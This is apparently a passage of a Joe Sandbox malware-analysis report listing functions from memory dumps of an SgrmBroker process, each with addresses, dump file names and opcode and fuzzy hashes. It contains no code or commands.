                                      • Opcode ID: 96e4aca5c6465ea3974b12f33e387326b87781aeba88223cbd3924c3bd37e8a2
                                      • Instruction ID: 36abfe05690d499391aa7a118c035d2daea8cbe55c37a63f3bcbf8053da72ded
                                      • Opcode Fuzzy Hash: 96e4aca5c6465ea3974b12f33e387326b87781aeba88223cbd3924c3bd37e8a2
                                      • Instruction Fuzzy Hash: F861CA34A08A5D8FDF94DF58C894BE97BB1FF69311F508266D40CE3255CB34A885CB80
                                      Function 00007FFD34A70E9A Relevance: .2, Instructions: 173COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b604fcfec72ebabfd04b47254d402868478729680665615b76d863b2c967ca4f
                                      • Instruction ID: f54c083a26cb6d8a902044688aaae6b6c87122fee7a025a763dc024aaf099a71
                                      • Opcode Fuzzy Hash: b604fcfec72ebabfd04b47254d402868478729680665615b76d863b2c967ca4f
                                      • Instruction Fuzzy Hash: 51611B70E085198FEBA4EB58C8E9AA9B7B1FF55305F1041B9D50DE32A1DF38AD819F40
                                      Function 00007FFD34A72995 Relevance: .2, Instructions: 169COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fb84d1562997475dceafdeac1ee5962e3bde6ed755089234212e4df048b1a673
                                      • Instruction ID: 9a662fa0c36ee86b06c32f2bebe223c0e2f97fdee41afe3118b223ac59e8477f
                                      • Opcode Fuzzy Hash: fb84d1562997475dceafdeac1ee5962e3bde6ed755089234212e4df048b1a673
                                      • Instruction Fuzzy Hash: BE519131A0868D8FDBA5DF54CC91AE97BB0FF5A308F5441FAD44DD7282CA38A945CB81
                                      Function 00007FFD34A74940 Relevance: .2, Instructions: 159COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7e027bb160a59f3768db1cd484f8fb9a1294e6718579b4e65c9087c909da14aa
                                      • Instruction ID: 87f36049fbccece5d89107244df235f569202aadb6800781d6e05ee47dd0e4d6
                                      • Opcode Fuzzy Hash: 7e027bb160a59f3768db1cd484f8fb9a1294e6718579b4e65c9087c909da14aa
                                      • Instruction Fuzzy Hash: 9E51C331A1864E8FDB95DF94C8A46EEBBF0FF59304F1441BAE458D3192CB78A954CB80
                                      Function 00007FFD34A72B15 Relevance: .1, Instructions: 140COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cb207520b047d153eaa3517c762fddd9a6256cbceb8f20284ab2668b594eb493
                                      • Instruction ID: 8e10d5a9c4de9da5aef3371d367ece0f9b08ad11b46726a7d8fc09b7cfe105db
                                      • Opcode Fuzzy Hash: cb207520b047d153eaa3517c762fddd9a6256cbceb8f20284ab2668b594eb493
                                      • Instruction Fuzzy Hash: EC41B231A1DA5D8FDB91DBA8D8A56E97BF0FF5A310F0400BAD508E3192CA285841C790
                                      Function 00007FFD34A75203 Relevance: .1, Instructions: 138COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 033b30967c059ffa01e6c9d38cd7d4bea87fe86a87b8a9a2434b929bc088c92b
                                      • Instruction ID: dff2ab16675ca410d8d40a23d7e26de956ebe18086beed66667b8a8fc37733b9
                                      • Opcode Fuzzy Hash: 033b30967c059ffa01e6c9d38cd7d4bea87fe86a87b8a9a2434b929bc088c92b
                                      • Instruction Fuzzy Hash: D9519134A1892D8FDBA4EB58C895BE8B7B1FB69305F5044E9910DE3251CB74AEC0CF40
                                      Function 00007FFD348A286A Relevance: .1, Instructions: 110COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eea3557426ace51d9105f61cb782bf4579a388ff704b61df9ebf4a83352e05de
                                      • Instruction ID: 9616ad10ed05466debdd502ecbb58fcad7658d8274f0c24ec7802bf6a8d0addc
                                      • Opcode Fuzzy Hash: eea3557426ace51d9105f61cb782bf4579a388ff704b61df9ebf4a83352e05de
                                      • Instruction Fuzzy Hash: 24413A30A0850E8FDF98EF58D4A0AEE73B1FF59304F140469D51AD7285CB75E891CB90
                                      Function 00007FFD34A771E1 Relevance: .1, Instructions: 105COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8261c4a2f750e428e2f930d2c007754a524de46709e3be59b675f7b049120cf2
                                      • Instruction ID: ab6b9d9411bede55ed861fd315a2a6c12c394fdf0f469b31573e9d15f1f1c14c
                                      • Opcode Fuzzy Hash: 8261c4a2f750e428e2f930d2c007754a524de46709e3be59b675f7b049120cf2
                                      • Instruction Fuzzy Hash: 9E31CF34E09A4D8FDB51EBA8C8506EDBFF0FF1A315F0401B6E158E7292DA38A945CB50
                                      Function 00007FFD348A234D Relevance: .1, Instructions: 102COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1777732bcd18ee48e494eee36aeeb393933f4e74a84ccddb1f62187df98b8dc6
                                      • Instruction ID: e5a40b306c89de739b2ae548337f9b9a6e7e5c8bc27a040730a573ea2f40eb79
                                      • Opcode Fuzzy Hash: 1777732bcd18ee48e494eee36aeeb393933f4e74a84ccddb1f62187df98b8dc6
                                      • Instruction Fuzzy Hash: FA316C31E09A4E8FDB94DF58C8A56FE7BB1FF59311F44047AE509E3291CA78A850CB90
                                      Function 00007FFD348A1DD0 Relevance: .1, Instructions: 88COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1cc4062a1d8db67f03ee0a8a74bfb09ba7b5e7fc9b86ea0052d22269fab211d9
                                      • Instruction ID: e0ed100214c2c988b3d7b837b5dd4009dc036b762c4105706d310dd2f5bb1962
                                      • Opcode Fuzzy Hash: 1cc4062a1d8db67f03ee0a8a74bfb09ba7b5e7fc9b86ea0052d22269fab211d9
                                      • Instruction Fuzzy Hash: 7F311734A1454E8FDB84EF28C495AAA77A1FF59304F1086A5E81DC3285CB38E991DBC0
                                      Function 00007FFD348A1DF8 Relevance: .1, Instructions: 83COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a6fc4355b8558a5f5437d5eb8f8d2b92f7e052a0fa79ed03d3bffb580131b11d
                                      • Instruction ID: 4f022d71ddfc01ce2efece710713a6d2d57464dbd9eec2f976129e8b1501220a
                                      • Opcode Fuzzy Hash: a6fc4355b8558a5f5437d5eb8f8d2b92f7e052a0fa79ed03d3bffb580131b11d
                                      • Instruction Fuzzy Hash: 53213931A0891E8FCF84EF58D491AFE7BF1FF69301F00006AE519E3291CA75A961DB90
                                      Function 00007FFD348A1EBD Relevance: .1, Instructions: 75COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5212ae5220101f96d2340cb823a81db7855219dc049ba1baac8c4af2bd9b9f0d
                                      • Instruction ID: 27c2bfd9e72e8ce9fffe585318eec67c94e4ab253f24393fd3ab23eeffad8f97
                                      • Opcode Fuzzy Hash: 5212ae5220101f96d2340cb823a81db7855219dc049ba1baac8c4af2bd9b9f0d
                                      • Instruction Fuzzy Hash: BE218034A18A4E9FDB84EF18C895AE97BE1FF55300F4046B5E518C7296DF78E851C780
                                      Function 00007FFD34903FBD Relevance: .1, Instructions: 75COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD34902000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34902000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34902000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2f560088a8ca7ea5dab170e94d2fdc61415fd5dd7182e2bb669000a28309fa0f
                                      • Instruction ID: ae08e607725d3aa36c5257d294fb8193c5eb1560633481958c2318d78e59ee0b
                                      • Opcode Fuzzy Hash: 2f560088a8ca7ea5dab170e94d2fdc61415fd5dd7182e2bb669000a28309fa0f
                                      • Instruction Fuzzy Hash: 9221AF35E0D6598FDB55DF64D8A02F977B0FF46310F00007AD159E3291CA7C6955DBA0
                                      Function 00007FFD34903B73 Relevance: .0, Instructions: 43COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD34902000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34902000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34902000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 20f9fc551a0bf4d10b0eff045cc9571a7e6d0adbe8dcfbc895af8e1e683d562e
                                      • Instruction ID: b446af117d9d6a13a6792d433eb3f50f857c124e35682567e11acc2c52227823
                                      • Opcode Fuzzy Hash: 20f9fc551a0bf4d10b0eff045cc9571a7e6d0adbe8dcfbc895af8e1e683d562e
                                      • Instruction Fuzzy Hash: B601A735E0C61D8EDB25AB108462AFDB370FF56300F0012BDC54E96086DE3C2598DBA1
                                      Function 00007FFD34902481 Relevance: .0, Instructions: 37COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD34902000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34902000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34902000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: afdcf958f5f00c262708c4105f98c21173ab48625ac5e3512e1a32ef7640e699
                                      • Instruction ID: 670fe17cbaca49bdcb161a73dd503124353b584b52b57386d8215641044b6844
                                      • Opcode Fuzzy Hash: afdcf958f5f00c262708c4105f98c21173ab48625ac5e3512e1a32ef7640e699
                                      • Instruction Fuzzy Hash: BDF0BE3180D64D8FDB55EF2888922E93FA0FF16310F4541BAD908CA182DB799964C781
                                      Function 00007FFD348A0911 Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dcee9bdb29559cea35d0ccc65420875a26161ad09e61eea67031abde657da284
                                      • Instruction ID: 39fc3344f6a1e89afb14c89a2a69209b30b3aa1e6cb140eb069cd973f63e4907
                                      • Opcode Fuzzy Hash: dcee9bdb29559cea35d0ccc65420875a26161ad09e61eea67031abde657da284
                                      • Instruction Fuzzy Hash: 51E0E53590D78D4FE7669F1488A22E93F50FF07310F0501BAD618C60C3DB6DA554D752
                                      Function 00007FFD34903BEA Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3352765762.00007FFD34902000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34902000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34902000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 180368a72578ab241be5eaefc96d1d4b58d41327fdfd54e7b13800230e36cc56
                                      • Instruction ID: 1c08c597005ade279f9517b4e48c5b6c6cb17b0479df9d32a405f594fc74fac1
                                      • Opcode Fuzzy Hash: 180368a72578ab241be5eaefc96d1d4b58d41327fdfd54e7b13800230e36cc56
                                      • Instruction Fuzzy Hash: 86F0F835E0852D8EDB64DB55D8A1BFDB3B0FF5A300F4011BAC14EE2185CEB86A949F50
                                      Function 00007FFD34A71C2D Relevance: .0, Instructions: 27COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000001B.00000002.3354169510.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_27_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6763a407c398e988c13b853e9588db8ba2100f89ef0c4f057480d438f3465965
                                      • Instruction ID: aeb5a52ff97b9080b7769c1c60e50dd7deb9317d7edab13d36f1d9a0af4121d3
                                      • Opcode Fuzzy Hash: 6763a407c398e988c13b853e9588db8ba2100f89ef0c4f057480d438f3465965
                                      • Instruction Fuzzy Hash: A7F0E235D5C24C4FD761EBA488A92E8BFE0FF06304F9540FAD908D2192DA395504C741